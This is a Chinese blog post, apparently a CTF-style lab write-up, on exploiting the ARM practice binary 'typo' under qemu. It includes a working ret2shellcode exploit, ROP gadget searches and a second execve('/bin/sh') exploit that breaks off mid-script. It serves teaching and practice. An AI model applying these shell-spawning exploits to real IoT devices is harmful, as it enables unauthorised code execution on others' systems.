

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言异构的getshell与命令执行这方面一直都比较薄弱，虽然之前星盟里面国资师傅有过培训，但是内容都比较简单，在真实的iot设备方面的构造还是有所欠缺，所以这次重新学习一下这方面的内容 参考链接: https:&#x2F;&#x2F;github.com&#x2F;ReAbout&#x2F;pwn-exercise-iot arm架构基础知识arm函数调用约定ARM 32位：  参数1-参数4 分别保存到 R0-R3 寄存器中 ，剩下">
<meta property="og:type" content="article">
<meta property="og:title" content="异构学习">
<meta property="og:url" content="http://blogyoulin.top/2024/03/15/%E5%BC%82%E6%9E%84%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="前言异构的getshell与命令执行这方面一直都比较薄弱，虽然之前星盟里面国资师傅有过培训，但是内容都比较简单，在真实的iot设备方面的构造还是有所欠缺，所以这次重新学习一下这方面的内容 参考链接: https:&#x2F;&#x2F;github.com&#x2F;ReAbout&#x2F;pwn-exercise-iot arm架构基础知识arm函数调用约定ARM 32位：  参数1-参数4 分别保存到 R0-R3 寄存器中 ，剩下">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161756671.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161757594.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161800428.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161803215.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161809594.png">
<meta property="article:published_time" content="2024-03-15T14:12:42.000Z">
<meta property="article:modified_time" content="2024-03-18T08:44:40.500Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202403161756671.png">
  
  
  
  <title>异构学习 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"blogyoulin.top","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>幽林</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>Links</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="异构学习"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-15 22:12" pubdate>
          March 15, 2024 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          14k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          117 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">异构学习</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>异构的getshell与命令执行这方面一直都比较薄弱，虽然之前星盟里面国资师傅有过培训，但是内容都比较简单，在真实的iot设备方面的构造还是有所欠缺，所以这次重新学习一下这方面的内容</p>
<p>参考链接:</p>
<p><a target="_blank" rel="noopener" href="https://github.com/ReAbout/pwn-exercise-iot">https://github.com/ReAbout/pwn-exercise-iot</a></p>
<h1 id="arm架构"><a href="#arm架构" class="headerlink" title="arm架构"></a>arm架构</h1><h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><h3 id="arm函数调用约定"><a href="#arm函数调用约定" class="headerlink" title="arm函数调用约定"></a>arm函数调用约定</h3><p>ARM 32位：</p>
<ul>
<li>参数1-参数4 分别保存到 R0-R3 寄存器中 ，剩下的参数从右往左依次入栈，被调用者实现栈平衡，返回值存放在 R0 中。</li>
<li>ARM中使用R0作为默认的返回值。 ARM 64位：</li>
<li>参数1-参数8 分别保存到 X0-X7 寄存器中 ，剩下的参数从右往左依次入栈，被调用者实现栈平衡，返回值存放在 X0 中。</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-224583.htm">常见函数调用约定(x86、x64、arm、arm64)</a></p>
<h3 id="arm汇编"><a href="#arm汇编" class="headerlink" title="arm汇编"></a>arm汇编</h3><p><a target="_blank" rel="noopener" href="https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#arm">https://b0ldfrev.gitbook.io/note/iot/mipsarm-hui-bian-xue-xi#arm</a></p>
<h2 id="pwn例题-typo"><a href="#pwn例题-typo" class="headerlink" title="pwn例题:typo"></a>pwn例题:typo</h2><p>binary:<a target="_blank" rel="noopener" href="https://github.com/ReAbout/pwn-exercise-iot/blob/main/linux_arm_stack/arm_pwn_typo/typo">typo</a></p>
<p>两种方法</p>
<h3 id="1-ret2shellcode"><a href="#1-ret2shellcode" class="headerlink" title="1.ret2shellcode"></a>1.ret2shellcode</h3><p>这种方法没记错的话只能在自己本地打通，因为是通过调试获取的栈地址会随着qemu发生变化，在远程大概率栈地址是不一样的</p>
<p>直接通过调试获得偏移地址，接着把shellcode写在栈上，然后覆盖返回地址为shellcode的地址就可以了</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br><span class="hljs-comment">#banary = &quot;./pwn&quot;</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF(&quot;./libc.so.6&quot;)</span><br><span class="hljs-comment">#libc=ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)</span><br>ip = <span class="hljs-string">&#x27;&#x27;</span><br>port = <span class="hljs-number">0</span><br>local = <span class="hljs-number">0</span><br><span class="hljs-keyword">if</span> local:<br>    io = process([<span class="hljs-string">&quot;qemu-arm-static&quot;</span>,<span class="hljs-string">&quot;-L&quot;</span>,<span class="hljs-string">&quot;/usr/arm-linux-gnueabi&quot;</span>,<span class="hljs-string">&quot;./typo&quot;</span>])<br><span class="hljs-keyword">else</span>:<br>    io = process([<span class="hljs-string">&quot;qemu-arm-static&quot;</span>,<span class="hljs-string">&quot;-L&quot;</span>,<span class="hljs-string">&quot;/usr/arm-linux-gnueabi&quot;</span>,<span class="hljs-string">&quot;-g&quot;</span>,<span class="hljs-string">&quot;1234&quot;</span>,<span class="hljs-string">&quot;./typo&quot;</span>])<br><br>context(log_level = <span class="hljs-string">&#x27;debug&#x27;</span>, os = <span class="hljs-string">&#x27;linux&#x27;</span>, arch = <span class="hljs-string">&#x27;arm&#x27;</span>)<br><span class="hljs-comment">#context(log_level = &#x27;debug&#x27;, os = &#x27;linux&#x27;, arch = &#x27;i386&#x27;)</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br>    gdb.attach(io)<br>    pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b&quot;\xff&quot;</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b&quot;\x7f&quot;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&quot;\x00&quot;</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">&#x27;%s -&gt; 0x%x&#x27;</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br>ru(<span class="hljs-string">&quot;Input ~ if you want to quit&quot;</span>)<br>s(<span class="hljs-string">b&#x27;\n&#x27;</span>)<br><br>sleep(<span class="hljs-number">0.5</span>)<br>io.recv()<br>payload=asm(shellcraft.sh()).ljust(<span class="hljs-number">112</span>,<span class="hljs-string">b&#x27;A&#x27;</span>)+p32(<span class="hljs-number">0xfffeef44</span>)<span class="hljs-comment">#shellcode</span><br>sl(payload)<br><br>ia()<br></code></pre></td></tr></table></figure>

<h3 id="2-rop"><a href="#2-rop" class="headerlink" title="2.rop"></a>2.rop</h3><p><code>svc：r7=0xb；R0=addr(“/bin/sh”)；R1=0；R2=0</code><br>以上系统调用等同于execve(“&#x2F;bin&#x2F;sh”,0,0)</p>
<p>svc: 通过这条指令切换到 svc 模式（svc 替代了以前的 swi 指令，是 ARM 提供的系统调用指令），进入到软件中断处理函数（ SWI handler ）。</p>
<p>所以我们RoP目标状态如下：</p>
<ul>
<li>R0 &#x3D; “&#x2F;bin&#x2F;sh”</li>
<li>R1 &#x3D; 0</li>
<li>R2 &#x3D; 0</li>
<li>R7 &#x3D; 0xb （对应arm下execve的系统调用）</li>
<li>svc</li>
</ul>
<p>1.&#x2F;bin&#x2F;sh的地址可以通过ida直接找到:0x006C384</p>
<p>2.rop</p>
<blockquote>
<p>在这里 pc 相当于x86的ret，构成gadget。</p>
</blockquote>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-number">0x00020904</span> : <span class="hljs-keyword">pop</span> &#123;<span class="hljs-built_in">r0</span>, <span class="hljs-built_in">r4</span>, <span class="hljs-built_in">pc</span>&#125;   <br><span class="hljs-number">0x00068bec</span> : <span class="hljs-keyword">pop</span> &#123;<span class="hljs-built_in">r1</span>, <span class="hljs-built_in">pc</span>&#125;   <br><span class="hljs-number">0x00014068</span> : <span class="hljs-keyword">pop</span> &#123;<span class="hljs-built_in">r7</span>, <span class="hljs-built_in">pc</span>&#125;   <br></code></pre></td></tr></table></figure>

<p>没有r2寄存器gadget，需要通过mov方式赋值，我们这有r4的，找个 <code>mov r2 , r4</code>。再通过blx r3跳转回去</p>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs armasm">(typo/ELF/<span class="hljs-meta">ARM</span>)&gt; search <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><br>[<span class="hljs-meta">INFO</span>] Searching for gadgets: <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><br><br>[<span class="hljs-meta">INFO</span>] File: typo<br><span class="hljs-number">0x0003338c</span>: <span class="hljs-keyword">mov</span> <span class="hljs-built_in">r2</span>, <span class="hljs-built_in">r4</span><span class="hljs-comment">; blx r3;</span><br></code></pre></td></tr></table></figure>

<p>于是还需要找能够控制r3寄存器的gadget</p>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs armasm">(typo/ELF/<span class="hljs-meta">ARM</span>)&gt; search <span class="hljs-keyword">pop</span> &#123;<span class="hljs-built_in">r3</span><br>[<span class="hljs-meta">INFO</span>] Searching for gadgets: <span class="hljs-keyword">pop</span> &#123;<span class="hljs-built_in">r3</span><br><br>[<span class="hljs-meta">INFO</span>] File: typo<br><span class="hljs-number">0x00053d10</span>: <span class="hljs-keyword">pop</span> &#123;<span class="hljs-built_in">r3</span>, <span class="hljs-built_in">lr</span>&#125;<span class="hljs-comment">; bx r3; </span><br><span class="hljs-number">0x00008160</span>: <span class="hljs-keyword">pop</span> &#123;<span class="hljs-built_in">r3</span>, <span class="hljs-built_in">pc</span>&#125;<span class="hljs-comment">; #选择这个</span><br></code></pre></td></tr></table></figure>

<p>最后找svc的gadget</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs clean">(typo/ELF/ARM)&gt; search svc<br>[INFO] Searching for gadgets: svc<br><br>[INFO] File: typo<br><span class="hljs-number">0x00023b78</span>: svc #<span class="hljs-number">0</span>; b #<span class="hljs-number">0x1ba94</span>; ldr r3, [pc, #<span class="hljs-number">0xa8</span>]; ldr r0, [r3, #<span class="hljs-number">4</span>]; sub sp, fp, #<span class="hljs-number">0x20</span>; pop &#123;r4, r5, r6, r7, r8, sb, sl, fp, pc&#125;; <br><span class="hljs-number">0x00021538</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x19598</span>; mov r0, r3; pop &#123;r4, r5, r6, r7, r8, pc&#125;; <br><span class="hljs-number">0x0002165c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x19674</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x000220c0</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x1a0d8</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x00024210</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x1c254</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x0003147c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x294b0</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x00047a54</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x3fa88</span>; mov r0, r3; pop &#123;r3, r4, r7, pc&#125;; <br><span class="hljs-number">0x00048354</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x4036c</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x0004839c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x403b4</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x00048454</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x4046c</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x0004858c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x405a4</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x0005e200</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0x56218</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x00014054</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0xc06c</span>; mov r0, r3; pop &#123;r7, pc&#125;; <br><span class="hljs-number">0x00014a5c</span>: svc #<span class="hljs-number">0</span>; cmn r0, #<span class="hljs-number">0x1000</span>; mov r3, r0; bhi #<span class="hljs-number">0xca74</span>; mov r0, r3; pop &#123;r3, r4, r7, pc&#125;; <br><span class="hljs-number">0x00024014</span>: svc #<span class="hljs-number">0</span>; ldr r7, [r6, #<span class="hljs-number">-0x43c</span>]; and r3, r7, #<span class="hljs-number">0xc</span>; cmp r3, #<span class="hljs-number">4</span>; beq #<span class="hljs-number">0x1c000</span>; pop &#123;r4, r5, r6, r7, r8, pc&#125;; <br><span class="hljs-number">0x0003226c</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; pop &#123;r3, r4, r5, r6, r7, pc&#125;; <br><span class="hljs-number">0x0001edf0</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; pop &#123;r3, r4, r5, r6, r7, r8, sb, sl, fp, pc&#125;; <br><span class="hljs-number">0x00030bd8</span>: svc #<span class="hljs-number">0</span>; mov r0, #<span class="hljs-number">0</span>; sub sp, fp, #<span class="hljs-number">0x20</span>; pop &#123;r4, r5, r6, r7, r8, sb, sl, fp, pc&#125;; <br><span class="hljs-number">0x0000ddc0</span>: svc #<span class="hljs-number">0</span>; mov r0, r6; add sp, sp, #<span class="hljs-number">0xc</span>; pop &#123;r4, r5, r6, r7, r8, sb, sl, fp, pc&#125;; <br><span class="hljs-number">0x0003b4bc</span>: svc #<span class="hljs-number">0</span>; mov r0, r6; pop &#123;r4, r5, r6, r7, r8, pc&#125;; <br><span class="hljs-number">0x00039f60</span>: svc #<span class="hljs-number">0</span>; mov r0, r8; pop &#123;r4, r5, r6, r7, r8, pc&#125;; <br><span class="hljs-number">0x0000fed0</span>: svc #<span class="hljs-number">0</span>; pop &#123;r3, r4, r5, r6, r7, pc&#125;; <br><span class="hljs-number">0x00016368</span>: svc #<span class="hljs-number">0</span>; pop &#123;r4, r5, r6, r7, pc&#125;; <br><span class="hljs-number">0x0001aca8</span>: svc #<span class="hljs-number">0</span>; pop &#123;r4, r5, r6, r7, r8, pc&#125;; <br><span class="hljs-number">0x00019568</span>: svc #<span class="hljs-number">0</span>; pop &#123;r4, r5, r6, r7, r8, sb, pc&#125;; <br><span class="hljs-number">0x000482fc</span>: svc #<span class="hljs-number">0</span>; pop &#123;r7&#125;; bx lr; <br><span class="hljs-number">0x000505c0</span>: svc #<span class="hljs-number">0</span>; sub sp, fp, #<span class="hljs-number">0x20</span>; pop &#123;r4, r5, r6, r7, r8, sb, sl, fp, pc&#125;; <br><span class="hljs-number">0x00008150</span>: svceq #<span class="hljs-number">0x89832c</span>; orrvs sp, lr, #<span class="hljs-number">140</span>, #<span class="hljs-number">6</span>; push &#123;r3, lr&#125;; bl #<span class="hljs-number">0xbd4</span>; pop &#123;r3, pc&#125;; <br></code></pre></td></tr></table></figure>

<p>至此所需要的gadget全部找到，就可以直接写rop了</p>
<p>exp:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br><span class="hljs-comment">#banary = &quot;./pwn&quot;</span><br><span class="hljs-comment">#elf = ELF(banary)</span><br><span class="hljs-comment">#libc = ELF(&quot;./libc.so.6&quot;)</span><br><span class="hljs-comment">#libc=ELF(&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;)</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">&#x27;&#x27;</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br>    io = process([<span class="hljs-string">&quot;qemu-arm-static&quot;</span>,<span class="hljs-string">&quot;-L&quot;</span>,<span class="hljs-string">&quot;/usr/arm-linux-gnueabi&quot;</span>,<span class="hljs-string">&quot;./typo&quot;</span>])<br><span class="hljs-keyword">else</span>:<br>    io = process([<span class="hljs-string">&quot;qemu-arm-static&quot;</span>,<span class="hljs-string">&quot;-L&quot;</span>,<span class="hljs-string">&quot;/usr/arm-linux-gnueabi&quot;</span>,<span class="hljs-string">&quot;-g&quot;</span>,<span class="hljs-string">&quot;1234&quot;</span>,<span class="hljs-string">&quot;./typo&quot;</span>])<br><br>context(log_level = <span class="hljs-string">&#x27;debug&#x27;</span>, os = <span class="hljs-string">&#x27;linux&#x27;</span>, arch = <span class="hljs-string">&#x27;arm&#x27;</span>)<br><span class="hljs-comment">#context(log_level = &#x27;debug&#x27;, os = &#x27;linux&#x27;, arch = &#x27;i386&#x27;)</span><br><br>def dbg():<br>    gdb.attach(io)<br>    pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">&quot;\xff&quot;</span>)[-4:].ljust(4, b<span class="hljs-string">&#x27;\x00&#x27;</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">&quot;\x7f&quot;</span>)[-6:].ljust(8, b<span class="hljs-string">&quot;\x00&quot;</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : 